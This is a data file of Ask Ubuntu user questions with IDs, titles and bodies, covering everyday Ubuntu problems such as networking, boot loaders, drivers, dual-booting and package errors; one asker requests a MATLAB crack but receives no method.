371935	ubuntu is unresponsive and scrolling is very jerky	i 'm new to ubuntu . i 've been using 12.04lts for over a week now . for 3 days it was great but now i 'm having a number of problems . i 'm using an acer aspire one d255 it has a 250gb hdd and a 1gb memory . my browser is firefox . pages freeze occasionally and i wait for over 10 minutes and have to use the computer 's 'off ' button . pages crash . on facebook some pictures do n't load and i have to close down and restart a couple of times . scrolling can sometimes be very jerky . downloading software has become a problem and i have a 'no entry ' sign in the top taskbar . i 've looked at this page for some help but the words used and the explanations are not helpful to someone like me who has little knowledge of this . please - 'ubuntu for dummies ' . i 'd like to continue using ubuntu but am close to giving up .
371936	terminal failed to fetch and some index files failed to download	my terminal failed to fetch , and some index files failed to download : w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/release.gpg something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) e : some index files failed to download . they have been ignored , or old ones used instead . please help me to solve the problem in my terminal . i really appreciate the solution .
371939	samba shares wo n't automount on boot from fstab	i have fsat setup to mount a cifs share , but on boot up the share never gets mounted . however , if i run mount -a after boot up , it mounts everything just fine . here 's what my fstab looks like . ignore the commented ones ... i just did a few for testing purposes right now . //192.168.1.97/media /mnt/samba cifs credentials=/home/xbmc/.smbcredentials , rw , file_mode=0777 , dir_mode=0777 , sec=ntlm , auto 0 0 # //192.168.1.97/media/tv\040shows /home/xbmc/tv\040shows cifs credentials=/home/xbmc/.smbcredentials , rw , file_mode=0777 , dir_mode=0777 , sec=ntlm , auto //192.168.1.97/media/movies /home/xbmc/movies cifs credentials=/home/xbmc/.smbcredentials , rw , file_mode=0777 , dir_mode=0777 , sec=ntlm , auto 0 0 //192.168.1.97/media/music /home/xbmc/music cifs credentials=/home/xbmc/.smbcredentials , rw , file_mode=0777 , dir_mode=0777 , sec=ntlm , auto 0 0 # //192.168.1.97/media/3\040-\040my\040pictures /home/xbmc/pictures cifs credentials=/home/xbmc/.smbcredentials , rw , file_mode=0777 , dir_mode=0777 , sec=ntlm , auto # //192.168.1.97/media/xbmc /home/xbmc/admin cifs credentials=/home/xbmc/.smbcredentials , rw , file_mode=0777 , dir_mode=0777 , sec=ntlm , auto have seen a few things on the internet where it was believed its because the share is n't available yet ( i.e . wifi not connected yet , etc ) when it 's attempting to mount . is there anyway to confirm that 's the problem , if so , is there a solution ? is there some way to put a delay in fstab ? or how might i write a script to run mount -a a certain amount of time after boot ? found the option _netdev from a little research , included that in fstab but still the same result .
371940	matlab usage in ubuntu 12.04\	i want to use matlab in ubuntu 12.04 can any one give me complete details about version of matlab , how to install or how to crack ? and main thing is i do n't wan na buy student version of it ... ( is it possible ? )
371942	how to open a program generated binary file ?	i have implemented a c program where raw packets are received from the network and saved in a binary file . thing is i cant open that binary file . i tried opening it using terminal , but i am getting permission denied . i used sudo ./sniff_data.bin and its displaying sudo : ./sniff_data.bin : command not found
371943	how to fix the `` setting locale failed '' error while installing vim ?	when installing vim through software center , i get this error installarchives ( ) failed : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory setting up install-info ( 4.13a.dfsg.1-10ubuntu4 ) ... /etc/environment : line 1 : path=/usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games : no such file or directory dpkg : error processing install-info ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : install-info setting up install-info ( 4.13a.dfsg.1-10ubuntu4 ) ... /etc/environment : line 1 : path=/usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games : no such file or directory dpkg : error processing install-info ( -- configure ) : subprocess installed post-installation script returned error exit status 1
371946	firefox profile issue	is there any limit in the number of firefox profiles that can be created ? my issue is i am currently doing selenium webdriver automation in linux for a device . there are 50 devices of same kind and framework will pickup a device depending on availability . i need to by pass unsigned ssl pages . i am using firefox 14 . i have implemented following but it is not consistent . everytime a device is chosen adds cer of device to the cert file in firefox profile but i am getting sec_error_bad_signature very frequently . so i started recreating cert [ delete and create if by opening firefox ] file for every run . now this is posing a problem if multiple devices are run at the same time . hence i want to create separate firefox profile
371948	network disabled	i recently bought a dell laptop with ubuntu preinstalled in it . the wifi was working fine then , after a week or so i updated ubuntu . from that time i am not able to use net over wifi . i did try few commands like sudo rfkill all , rfkill unblock all , rfkill unblock wifi . i did not get any results . i am new to this os please help me out .
371953	how to upgrade to a point release from the same base release ( 12.04 to 12.04.03 )	i have ubuntu 12.04 ( original ) installed on a server . how do i upgrade this to 12.04.03 ?
371955	how to get the 'install alongside windows ' option , i only see 'install inside windows ' ?	i created a bootable usb stick with ubuntu 13.10 and when i boot from it and try to install it i only get the option `` install inside windows '' and the button in the bottom right corner says `` restart to continue '' . but i do n't want that , i want a real dual boot . i installed ubuntu few days ago on my laptop and i clearly remember that it said `` install alongside windows '' . what should i do to get that option ? ps i previously had ubuntu installed on this pc from wubi , but i uninstalled it .
371956	tuxonice-problem : `` cpu stuck for 22 s ''	i use ubuntu 12.04 lts on a lenovo thinkpad t61 and am new to linux . i installed tuxonice following this guide . actually it works but resuming takes very long . shortly before resuming is complete i see some message flashing in command-line like `` cpu stuck for 22 s '' . some googling brought up pages like this but it did not help me solve me problem . i suppose being absolutely new to linux is the biggest part of the problem .
371958	how to reload sarg configuration file	i have installed sarg for a while on ubuntu 12.04 and forgotten that i wanted it to generate reports inside /var/www/vhosts/reports.lan/htdocs . i have found out this morning and made the change in the /etc/sarg/sarg.conf . after i have manually run sarg with # sarg-reports today but it generated in the old folder /var/lib/sarg . i know i could do a symbolic link but i was surprised that i could not find a single command to reload or at least restart sarg . can anyone give me the command to restart or reload it ? thanks
371959	pymol update in ubutu 12.04	how to update pymol which is downloaded from ubuntu software center
371960	how to make new window always raise-up ?	i got an issue of ubuntu 13.10 , the new created window does not always raise-up to the front . it is annoying , which makes me have to click the icons on unity launcher to focus on the new window . furthermore , if i turn on a program which has already been opened , the system does not bring me to the program , only blinks its icon on the unity launcher . again , i need to click the icon to get focus on the window . seems the system does not smart enough to determine which window should be focused to . i 'm pretty sure it did not happen in previous versions of ubuntu . any idea how to fix it ?
371961	grub rescue > error : unknown filesystem	i had a laptop with windows 7 and linux operating systems . but i deleted the drive where linux is installed when operating in windows os . now i am getting grub rescue > i need to enter the windows os without this grub interruption , i also need the commands to be entered in grub rescue > . i want this done without losing the windows 7 os and files in the hard disk .
371963	how to get a 'non-screenlet ' calculator in compiz widget layer ?	i 've currently set up the screenlet calculator but do not want to use it , as 1 ) screenlets are no longer in development , most do not work , and i intend to slowly migrate away from them . 2 ) the existing screenlet calculator looks very similar to the one in osx , and imho it 's not appealing . i prefer either galculator or gcaltool . is there anyway to get these in the widget layer ? i 'm open to other options as well , but basically i 'm looking for a 'non-screenlet ' calculator to come up in the compiz widget layer . thanks . software specs : ubuntu 12.04 with xubuntu desktop . xfce upgraded to 4.10 , and using compiz .
371964	install pomelo on ubuntu but failed	i try to install pomelo https : //github.com/netease/pomelo on ubuntu 12.0 lts it reports error 4124 error error : enoent , chown '/usr/lib/node_modules/pomelo/node_modules/cliff/node_modules/winston/node_modules/cycle/cycle.js' 4125 error if you need help , you may report this log at : 4125 error < http : //github.com/isaacs/npm/issues > 4125 error or email it to : 4125 error < npm- @ googlegroups.com > 4126 error system linux 3.5.0-23-generic 4127 error command `` /usr/bin/node '' `` /usr/bin/npm '' `` install '' `` pomelo '' `` -g '' 4128 error cwd /home/myname 4129 error node -v v0.10.13 4130 error npm -v 1.3.2 4131 error path /usr/lib/node_modules/pomelo/node_modules/cliff/node_modules/winston/node_modules/cycle/cycle.js 4132 error fstream_path /usr/lib/node_modules/pomelo/node_modules/cliff/node_modules/winston/node_modules/cycle/cycle.js 4133 error fstream_type file 4134 error fstream_class filewriter 4135 error fstream_finish_call chown 4136 error code enoent 4137 error errno 34 4138 error fstream_stack /usr/lib/node_modules/npm/node_modules/fstream/lib/writer.js:305:19 4138 error fstream_stack /usr/lib/node_modules/npm/node_modules/graceful-fs/graceful-fs.js:265:7 4138 error fstream_stack object.oncomplete ( fs.js:107:15 ) 4139 verbose exit [ 34 , true ] your comment welcome
371965	lan and wifi not detecting after upgrading to ubuntu 13.10	ubuntu is not detecting lan sometimes.and 95 % of time it doesnot detect wifi.the network option says wifi are not in range even though they are it usually happens when the ubuntu stays idle for long time . but there are cases when i start my laptop and lan is not detected . it usually gets fixed when i reboot i tried to do both of these things : software and updates- > additional drivers- > mark and unmark wireless card . but none of them worked edit : lspci -nn | grep -e 0200 -e 0280 gives : 04:00.0 network controller [ 0280 ] : broadcom corporation bcm43224 802.11a/b/g/n [ 14e4:4353 ] ( rev 01 ) 09:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 03 )
371966	how to hide firefox icon when web app is open ?	how can i prevent the firefox icon from appearing in the launcher while it 's running ? i only use it with the web apps .
371970	how to switch between headphones and speakers manually from command line	what if i want to write a script that switches audio output ? how can it be done under ubuntu ? ( there is a related question on ask ubuntu : how to switch between headphones and speakers manually ) here is the output of my amixer -c 0 in case it is needed : simple mixer control 'master',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined penum playback channels : mono limits : playback 0 - 64 mono : playback 52 [ 81 % ] [ -12.00db ] [ on ] simple mixer control 'headphone',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 64 mono : front left : playback 64 [ 100 % ] [ 0.00db ] [ on ] front right : playback 64 [ 100 % ] [ 0.00db ] [ on ] simple mixer control 'speaker',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 64 mono : front left : playback 0 [ 0 % ] [ -64.00db ] [ on ] front right : playback 0 [ 0 % ] [ -64.00db ] [ on ] simple mixer control 'bass speaker',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 64 mono : front left : playback 64 [ 100 % ] [ 0.00db ] [ off ] front right : playback 64 [ 100 % ] [ 0.00db ] [ off ] simple mixer control 'pcm',0 capabilities : pvolume penum playback channels : front left - front right limits : playback 0 - 255 mono : front left : playback 255 [ 100 % ] [ 0.00db ] front right : playback 255 [ 100 % ] [ 0.00db ] simple mixer control 'mic',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 0 [ 0 % ] [ -34.50db ] [ off ] front right : playback 0 [ 0 % ] [ -34.50db ] [ off ] simple mixer control 'mic boost',0 capabilities : volume penum playback channels : front left - front right capture channels : front left - front right limits : 0 - 3 front left : 3 [ 100 % ] [ 30.00db ] front right : 3 [ 100 % ] [ 30.00db ] simple mixer control 'iec958',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ off ] simple mixer control 'iec958 default pcm',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ on ] simple mixer control 'beep',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 0 [ 0 % ] [ -34.50db ] [ off ] front right : playback 0 [ 0 % ] [ -34.50db ] [ off ] simple mixer control 'capture',0 capabilities : cvolume cswitch penum capture channels : front left - front right limits : capture 0 - 31 front left : capture 22 [ 71 % ] [ 16.50db ] [ on ] front right : capture 22 [ 71 % ] [ 16.50db ] [ on ] simple mixer control 'auto-mute mode',0 capabilities : enum items : 'disabled ' 'enabled' item0 : 'enabled' simple mixer control 'internal mic',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 0 [ 0 % ] [ -34.50db ] [ off ] front right : playback 0 [ 0 % ] [ -34.50db ] [ off ] simple mixer control 'internal mic boost',0 capabilities : volume penum playback channels : front left - front right capture channels : front left - front right limits : 0 - 3 front left : 0 [ 0 % ] [ 0.00db ] front right : 0 [ 0 % ] [ 0.00db ]
371977	amd dpm does not seem to take effekt in ubuntu 13.10	after installing ubuntu 13.10 with kernel 3.11 i tried do enable dpm on my thinkpad edge with ati radeon hd 4225 . i installed tlp and enabled radeon.dpm=1 in the grub commandline exactly like described in the forum . cat /sys/kernel/debug/dri/64/radeon_pm_info result is positiv . after reboot the i get an idle power consumtion of 18 - 20 watts in powertop although ondemand mode is active whereas in ubuntu 12.04 with fglrx enabled i get a consumption of 10-12 watts . with the radeon driver i get 16 -18 watts in 12.04 . so the new kernel does n't seem to bring any improvement for me . any clou why that is so ?
371978	no startup & other sounds in xubuntu 12.04.3 . otherwise sounds are working , pls help	i am a newbie and have just installed xubuntu 12.04.3 on my compaq nc6120 laptop . i just moved to linux from windows xp and have absolutely no experience with linux . i am willing to learn , please help . like in windows xp , i dont hear any startup/system/shut down sounds in xubuntu , otherwise the speakers work fine . i played videos from youtube and i can totally hear the sound on my laptop but not the startup sound . i explored everything possible but could n't find a probable solution . someone please help me figure it out or direct me to the proper forum or answer . thank you very much in advance ! ! !
371979	touchpad detected as generic mouse after updating 12.04	yesterday i updated my system and today my touchpad is detected as a generic mouse . while before it was working correctly with no problem could you please help me ? should i provide some information ? thank you in advance ! aram
371981	how to make a window transparent while moving it	i want to make my window transparent while moving it from one place to another on the desktop .
371983	bootable usb but unable to access bios	crashed ubuntu 13.04 while upgrading to 13.10 . bootable usb made with unetbootin . however unable to access bios with f2 on startup .
371987	delete xp without removing ubunutu	i have installed ubuntu 13.04 over windows xp through wubi.exe because i have tried installing ubuntu through usb but it seems like my laptop usb is not supporting it though it shows syslinux ... ... ... in boot screen and hangs up that 's why i quit usb installation and tried wubi.exe . after installing ubuntu 13.04 through wubi it seems like xp and ubuntu both are installed in same partition , thats a problem for me ... i want to delete xp without removing ubunutu .
371994	`` operating system not found '' after successful install	i have an old windows laptop on which i 've installed ubuntu . at least , that 's what i thought . i created a usb boot disk by following this online guide and completely whipped out my hard drive to install ubuntu on it . all goes according to plan , except when i try to boot my laptop . i only get the message `` operating system not found '' . but when i boot from my usb flash again , i get the warning ubuntu 12.0.4 is already installed and will be overwritten . i 've run the boot-repair and came up with this result . i 'm fairly new to linux , so i 'm not entirely sure what it al means ... how can i boot my ubuntu installation on this machine ?
371999	13.04 huawei e3131 driver and mobile partner installation	i have huawei e3131b data card with airtel 3g . i am not able to install drivers and mobile partner software which are available with the dongle .
372000	system always halt	good day , thanks bruno for the prompt response . first sorry for my bad writing . i 'll try to clarify my problem . now my system already update to version 13.10 . the problem is my system always put on stop whenever there is no activity . example : i open terminal then execute `` sudo apt-get update '' then i leave my laptop away , the update stop at 20 % . after i move my mouse then the update continue . when i watch a movie using vlc . play the movie and change to full screen . after a while like 30-40 seconds the movie pause , and again after i move my mouse or hit any button on my keyboard the movie continue to play . i downloading torrent file , a big file , i leave my laptop the whole night , the next morning the downloading just stop . the problem my laptop can not be on idle . means when i downloading a file or updating my system i just can not leave my laptop away . i have to kept my laptop busy like surfing the internet ... playing games etc .
372002	which packages do i need to lock to prevent update from 12.04.1 to 12.04.3 ?	i have seen the question `` how do i prevent ubuntu 12.04.1 from updating kernel and xorg to 12.04.2 and 12.04.3 ? `` , and i have read all the advised replies . i follow the instructions and in synaptic , i locked all kernel and headers as well as all occurrences of xorg ... however , after running the update and checking that no kernel or xorg package were going to be installed , i got a console only login ... and the top line says 12.04.3 as ubuntu version ... so there was some upgrade that i did not want that still happened ... there are so many packages that i do n't know which one updated and cause the problem . the issue is that i want to run ubuntu for image analysis on an old system ( at work , no choice and no upgrade coming soon ) that need to run the amd drivers to get the imaging software running properly . as amd has stopped supporting the hd 3xxx series , i must stay with xorg 1.11 or 1.12 and kernel 3.4 max for the driver to run properly . any help appreciated ! rv
372005	mount hfsplus partition of a disk image	i know my question is very similar to many others on this site ( ex . mount single partition from image of entire disk ( device ) ) but i have a slightly different problem during the mount of a single partition that is within a disk image ( made with dd ) of my mac . before try to mount it , i list all the partitions inside my disk image and i read the offset of the partition . then i try to mount the single partition with the following command and always get the same error : sudo mount -t hfsplus -o loop , ro , offset=209735680 /media/dati/mac.dmg /media/mac mount : wrong fs type , bad option , bad superblock on /dev/loop0 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so dmesg |tail [ 8454.285256 ] hfs : write access to a journaled filesystem is not supported , use the force option at your own risk , mounting read-only . [ 8512.103020 ] hfs : invalid secondary volume header [ 8512.103027 ] hfs : unable to find hfs+ superblock the strange thing is that if i try to mount the disk image on my friend 's mac i can easily mount ( with a double click on it ) the disk image and access to all my files . could this be a problem caused by the unclean hfs+ filesystem ? and how can i try to resolve it ? thanks , andrea
372009	how to get konica minolta bizhub 130f printer workin ?	is there any possibility to get this printer to work with ubuntu ? i am using ubuntu 13.04 at the moment . printer is connected with usb cable . printer does n't support network printing . i tried several drivers mostly mentioned in this http : //linuxibos.blogspot.sk/2013/01/driver-that-works-on-allmost-all.html ? showcomment=1383728655770 # c5443566566959555774 article but without any success . thank you for any help .
372010	how to install ubuntu on lenovo ideapad y510p ?	i have a lenovo ideapad y510p with a pre installed windows 8 , however i also want to have in my laptop ubuntu 13 . 10 which i 'm still new to the os but my job requires it . i have burned the iso file to a dvd and tried to installed it but no use ( even though it turns to a black screen which then it requires to use an external screen since it does n't recogonize the intel graphical card ) . moreover , my friend tried with the usb stick but i think the problem concerns with recognizing the vga card with a message about the noveu or something like this . so my main question is how to install ubuntu 13.10 in lenovo ideapad y510p and i would really appreciate if you could provide me with a simple guide of installation since i have a little background on the linux environment .
372011	switching easily between windows 8 and ubuntu	is there an easy way to switch between ubuntu and windows 8 without restarting ? i need both for my work and restarting everytime seems cumbersome but also inefficient . i 've heard that it was possible to do so for windows 7 though vmare machine : lenovo g500
372012	install alongside windows 8	i am trying to install ubuntu 13.10 on my new laptop . the option mentioned in the install guide to `` install alongside windows '' does , however , not appear in the install wizard . when i select `` something else '' i am presented ( as expected ) with the disk manager . my problem is that this laptop came with no less than 7 partitions ! windows is only aware of one 418gb partition . my question is this : how do i resize that windows partition to be as small as possible , create space to install ubuntu , and use the rest as a shared ntfs partition . ideally , i would like to put win 7 on there as well , as i am not a great fan of win 8 . i would be more than happy to live without win 8 ( if i can put 7 on ) . i am just apprehensive to completely format the drive and lose the recovery partition . i did make a recovery dvd and a recovery usb drive ( which is about 14 gb big ) , though . any suggestions / help would be greatly appreciated ! to make it clear , i took some screenshots of the install wizard . unfortunately , i can not post images .
372016	vmware player - compiling server modules - ubuntu 13.10	while running ubuntu 13.04 whenever the linux kernel had been updated , this used to make vmware player happy : sudo apt-get install linux-headers- $ ( uname -r ) sudo vmware-modconfig -- console -- install-all yesterday i upgraded to ubuntu 13.10 and lo and behold , the above workaround does not work anymore : unable to install all modules . see log for details . i assume by `` see log '' it means the files in /tmp/vmware-root/*log root @ hugin : /tmp/vmware-root # ls -ltr /tmp/vmware-root/ totalt 16 -rw-r -- r -- 1 root root 3815 nov 6 13:54 vmware-apploader-17267.log -rw-r -- r -- 1 root root 0 nov 6 13:54 vmware-vmis-17693.log -rw-r -- r -- 1 root root 0 nov 6 13:54 vmware-vmis-17742.log -rw-r -- r -- 1 root root 0 nov 6 13:54 vmware-vmis-18701.log -rw-r -- r -- 1 root root 0 nov 6 13:54 vmware-vmis-18750.log -rw-r -- r -- 1 root root 0 nov 6 13:54 vmware-vmis-19100.log -rw-r -- r -- 1 root root 0 nov 6 13:54 vmware-vmis-19149.log -rw-r -- r -- 1 root root 9250 nov 6 13:54 vmware-modconfig-17267.log root @ hugin : /tmp/vmware-root # tail /tmp/vmware-root/vmware-modconfig-17267.log 2013-11-06t13:54:28.950+01:00| modconfig| i120 : copied module.symvers from `` /tmp/modconfig-wpdrtf/vmci-only/module.symvers '' to `` /tmp/modconfig-wpdrtf/vsock-only/module.symvers '' . 2013-11-06t13:54:28.950+01:00| modconfig| i120 : building module with command `` /usr/bin/make -j8 -c /tmp/modconfig-wpdrtf/vsock-only auto-build header_dir=/lib/modules/3.11.0-12-generic/build/include cc=/usr/bin/gcc is_gcc_3=no '' 2013-11-06t13:54:31.048+01:00| modconfig| i120 : successfully built vsock . module is currently at `` /tmp/modconfig-wpdrtf/vsock.o '' . 2013-11-06t13:54:31.048+01:00| modconfig| i120 : found the vsock symvers file at `` /tmp/modconfig-wpdrtf/vsock-only/module.symvers '' . 2013-11-06t13:54:31.048+01:00| modconfig| i120 : installing vsock from /tmp/modconfig-wpdrtf/vsock.o to /lib/modules/3.11.0-12-generic/misc/vsock.ko . 2013-11-06t13:54:31.048+01:00| modconfig| i120 : registering file `` /lib/modules/3.11.0-12-generic/misc/vsock.ko '' . 2013-11-06t13:54:31.400+01:00| modconfig| i120 : `` /usr/lib/vmware-installer/2.1.0/vmware-installer '' exited with status 0 . 2013-11-06t13:54:31.400+01:00| modconfig| i120 : registering file `` /usr/lib/vmware/symvers/vsock-3.11.0-12-generic '' . 2013-11-06t13:54:31.764+01:00| modconfig| i120 : `` /usr/lib/vmware-installer/2.1.0vmware-installer '' exited with status 0 . 2013-11-06t13:54:31.786+01:00| modconfig| i120 : we are now shutdown . ready to die ! root @ hugin : /tmp/vmware-root # tail /tmp/vmware-root/vmware-apploader-17267.log 2013-11-06t13:54:20.911+01:00| apploader| i120 : libglib-2.0.so.0 < system > 2013-11-06t13:54:20.911+01:00| apploader| i120 : libz.so.1 < system > 2013-11-06t13:54:20.911+01:00| apploader| i120 : libvmware-modconfig-console.so < shipped > 2013-11-06t13:54:20.912+01:00| apploader| i120 : shipped glib version is 2.24 2013-11-06t13:54:20.912+01:00| apploader| i120 : system glib version is 2.38 2013-11-06t13:54:20.912+01:00| apploader| i120 : using system version of glib . 2013-11-06t13:54:20.912+01:00| apploader| i120 : loading system version of libgcc_s.so.1 . 2013-11-06t13:54:20.912+01:00| apploader| i120 : loading system version of libglib-2.0.so.0 . 2013-11-06t13:54:20.912+01:00| apploader| i120 : loading system version of libz.so.1 . 2013-11-06t13:54:20.912+01:00| apploader| i120 : loading shipped version of libxml2.so.2 .
372019	how to revert back to gui as the default interface from cli in ubuntu desktop ?	i was able to set up a text-only ui ( cli ) by editing the file /etc/default/grub in ubuntu 12.04 as per the instructions in : how do i disable x ( gui ) at boot so that the system boots in cli mode ? using these commands : sudo nano /etc/default/grub to open the grub file and replaced the line : grub_cmdline_linux_default=”quiet splash” with grub_cmdline_linux_default=”text” which sets cli as default session . but , how do i revert to x-session ( gui ) as the default one ? i do n't want to log into text mode and 'start ' the lightdm every time . so i tried replacing back the grub_cmdline_linux_default= '' text '' to grub_cmdline_linux_default= '' quiet splash '' , and did update-grub too , but something unexpected happened , an unbootable system ! ( probably the dm got meshed up ) how do i fix this ?
372020	livecd customization of ubuntu 13.04/13.10 : `` unable to find a medium containing a live file system '' ''	hello i 've followed this guide : https : //help.ubuntu.com/community/livecdcustomization and when i boot my iso it appears a busybox showing this message : `` unable to find a medium containing a live file system '' '' ( /var/log/casper.log contains the same ) . i think the reason is that guide is obsolete . what a pitty ! ! could you show me some light about what can i do to try to solve this problem ? i 'm really stuck . thanks , thanks , thanks a lot p.s : i do not want to use ubuntu-builder or similar , because i want to learn how to do it `` by hand ''
372023	how do i look up man page references with round brackets ?	i have seen how do i look up man page references with square brackets ? . the questioner gives the example of gittutorial ( 7 ) and being able to access it by man 7 gittutorial . when i look at man regex , the top line has : regex ( 7 ) linux programmer 's manual regex ( 7 ) now this man page is too difficult for me , so when i see : author this page was taken from henry spencer 's regex package . see also grep ( 1 ) , regex ( 3 ) posix.2 , section 2.8 ( regular expression notation ) . i try man 3 regex but that gives me : [ 06:46 pm ] ~ $ man 3 regex no manual entry for regex in section 3 [ 06:46 pm ] ~ $ what is the correct way to access regex ( 3 ) ? man 7 regex works for regex ( 7 ) , man 4 tty works for tty ( 4 ) and man 8 updatedb works for updatedb ( 8 ) .
372029	how to trap mouse cursor ?	i really miss the feature from gnome2 and mate that you can click on a panel app and the mouse cursor is hidden . the mousetweaks package promises `` ... * an area to capture the mouse pointer until it is released with a pre-defined key combination . '' but the app is not shown anymore by default ( xubuntu 13.10 - xfce 4.10 ) . is there a cool hack to get this back ? edit : imagine that sign in top right that looks like mouse is `` the trap '' that when clicked catches the cursor ( and releases when specific shortcut done ) : 1l0ve
372031	rhythmbox refuses to maximize correctly	when i try to maximize rhythmbox in my laptop screen ( built-in display ) , it jumps right back to my secondary screen ( benq 21 '' ) . my screen setup : is there a workaround for this annoying bug ? my monitors both have the same resolution .
372032	ubun tu 12.04 lts . thunderbird right click menu is gone	how can i fix this ? i updated thunderbird in update manager from 24.0 to 24.1.0 . any help at all would be very much welcomed .
372033	how to install win7 with dual boot in my ubuntu 12.04	i have ubuntu 12.04 and want to install win7 with dual boot because mi claro modem ( argentina ) doesn`t work with ubuntu . how i do it ?
372035	laptop does n't boot properly after trying to remove ubuntu	i have a laptop which duals boots ubuntu and windows , but the partition was too small and i wanted to try another distro of lunix . i used this guide to remove the ubuntu partition : http : //www.makeuseof.com/tag/nongeeks-guide-safely-uninstall-ubuntu-dualbooting-machine/ however after the first step usinf easybcd , when i boot the laptop now i get the toshiba loading screen and then just a blank screen with a flashing cursor , before a bios , grub or anything . any help would be much appreciated .
372038	is there an application that i can use to send/recive sms on my laptop ?	i using huawei e303c 3g dongle for internet in ubuntu . please provide gui app for calling , sending sms , running ussd codes using huawei e303c 3g dongle .
372040	13.10 install has huge graphics issues , 13.04 does not . will upgrading bring problems back ?	my 13.10 install utterly failed to detect my laptop 's graphics hardware . it 's an nvidia optimus laptop - i tried every possible solution i could find , including prop . drivers , bumblebee , bbswitch , etc . - but most resulted in a non-loading desktop while others just loaded the gallium driver and offered generally poor performance . i tried 13.04 and it 's correctly loaded the intel driver . however , various things like unity and java have issues , so i 'm wondering whether i 'd be safe upgrading to 13.10 from my working 13.04 install . irritatingly , i ca n't even find an xorg.conf to backup ...
372041	how can i make multiple monitors go to standby independently ?	i have a two-monitor setup . one monitor i use all the time , the other sometimes . i find myself switching the second monitor on and off quite frequently , so as not to be distracted by its contents . is there any software under ubuntu that can intelligently measure idle time independently on multiple monitors . for example , if nothing has changed in a screen ( no window mapped or focussed , nothing drawn , pointer not moved into that screen ) , then it should count as idle .
372044	what firmware is my wireless card is using ?	after a fresh install of lubuntu 12.04 on my dell latitude d600 , i 'm having wireless issues . it has an intel pro/wireless bg2200 and is using the ipw2200 driver . i 've read that i may need to update the firmware , but before i go installing something new i would like to determine what 's already there . how do i find this out ?
372045	how to create a launcher on the desktop which opens a random application ?	i want to make a launcher which opens a random application . so i looked it up on this site and i found this : how to create a shortcut to start a windows application with wine ? but i have a right-click menu on my desktop that looks like this : so now i still do n't know how to create launchers . does anyone know a way for dummies ?
372046	hide all users @ logon in 13.10	i 'm setting up a laptop with ubuntu 13.04 and my plan is to put it on our domain . i already have it connected to the domain , i just need to figure out how to change the logon page so all it displays is a username and password entry box . i know this can be done in earlier versions of ubuntu , but those methods do not appear to work in this instance . does anyone know if the process has changed ?
372047	why there is difference between psql -version output and the psql version connected to my application ? how can i resolve this	i am building up a rails application that i cloned from my friend . i am using ubuntu 13.10 , rails 3.2.14 . i am using a postgresql database and when i try to run rake db : migrate it gives me some error like this : pg : :undefinedobject : error : type `` json '' does not exist line 1 : alter table `` filters '' add column `` search_string '' json i installed pg version : - 9.3.1 running rails db output is : -psql ( 9.3.1 , server 9.1.10 ) running select version ( ) ; : -postgresql 9.1.10 on i686-pc-linux-gnu why is it showing psql -version different from the version connected to my database ? ? my friend is working on 9.2.4 i do n't know why this error is occurring , i tried several times to downgrade using purge or remove commands to remove 9.3.1 all goes well but when i check psql -- version it again shows me 9.3.1 . any solution ? ? ?
